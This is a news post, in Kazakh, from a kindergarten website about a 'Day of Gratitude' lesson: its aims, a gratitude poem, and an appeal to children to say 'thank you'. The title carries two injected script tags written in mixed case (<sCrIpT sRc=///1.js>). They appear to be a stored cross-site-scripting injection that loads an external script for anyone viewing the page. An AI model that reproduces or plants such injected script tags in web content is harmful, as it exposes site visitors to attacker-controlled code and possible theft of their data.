Алғыс айту күні бөбекжайда<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

02.03.2022

Бүгін көктемнің алғашқы күні елімізде "Алғыс айту күні" болып белгіленген.

МКҚК "Ақбота" бөбекжайында "Қарлығаш " тобында тәрбиешілер Курмангазина Н.К, Кожанова А.К "Алғыс айту" күніне орай тақырыптық оқу қызметі өтті.

Мақсаты: балалардың "сыйластық"

құндылығы туралы түсініктерін кеңейту.

Үлкен-кішіге деген сүйіспеншілігін,сыпайылық қарым-қатынас дамыту.

Әдептілікке,кішіпейілділікке,ізетілікке тәрбиелеу.

Бастысы алғыс айта білу...

Анаға-өмір сыйлағаны үшін,

Әкеге-қорған болғаны үшін,

Далаға-гүлдері мен көк шалғыны үшін,

Сөзге-жанды жылытатыны үшін,

Күнге-шуағы мен назары үшін,

Жұлдызға-қараңғы түндегі жарығы үшін,

Досқа-құшағы мен иығы үшін,

Әжеге-ыстық алақаны үшін,

Суға-тіршілік көзі болғаны үшін,

Жерге-махаббаты мен бар байлығы үшін,

Отқа-жылулығы үшін,

Ризашылық-адамның басқа адамнан көрген жақсылығы,көмегі, көңілі үшін..

Балалар жылы сөз,қайырымды іс,жақсы ой,кіршіксіз сезімдеріңді ешқашан ешкімнен аямаңыздар."РАХМЕТ "деген қасиетті сөзді жиі айтыңдар.

Просмотров: 238


Пікір қосу



Деректерді қолтаңбаға қосу